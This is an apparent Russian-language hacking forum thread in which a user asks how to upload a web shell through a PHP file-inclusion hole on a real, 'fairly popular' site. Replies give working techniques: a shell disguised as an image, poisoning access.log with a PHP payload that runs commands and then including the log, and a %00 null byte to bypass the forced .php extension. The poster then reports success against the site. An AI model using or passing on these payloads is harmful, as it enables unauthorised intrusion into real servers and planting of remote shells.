![]() |
Инклюд )
Вообщем нашел сайтег.... довольно популярный... там php инклюдинг... При вводе несуществующей страницы вылитает
Код:
Warning: include() [function.include]: URL file-access is disabled in the server configuration in /hosting/www/main/samp/v2/index.php on line 369Инклюд типа Код:
someweb.ru/v2/index.php?page=http://someweb.com/shell&lang=ru&PHPSESSID=0548fe13c6b6c63e4bbd59538e1c77daЕсть какие либо варианты как залить шелл ? |
Удаленный инклюд запрещен, попробуй залить шелл, к примеру, как картинку, и проинклюдь его.
ps: _http://www.dyc.lv ? :D |
попробуй залить через логи,
только учти попытка будет всего одна ;) а потом проведи локальный инклуд. |
Цитата:
|
например делаешь запрос к существующей странице
www.site.com/index.php?myadd=<?php exec($_GET['cmd']) ?> этот запрос должен попасть в access.log после этого нужно этот аксес-лог проинклудить. и по идее утебя получится мини шелл... после этого можешь уже загрузить чтото посущественнее. |
...или пробрути (perl; в password.txt пароли):
PHP код:
|
Да в том то и прикол что он после названия добавляет еще и .php
|
%00
?cmd=http://site.ua/shell.php? |
УРА! Спасибо у меня получилось.
Скрин: http://bildem.lv/bildes/04c347ced80b...263bf7f6cc.JPG А у вас? |
Сбрутил что ли? о_0
|
| Время: 16:06 |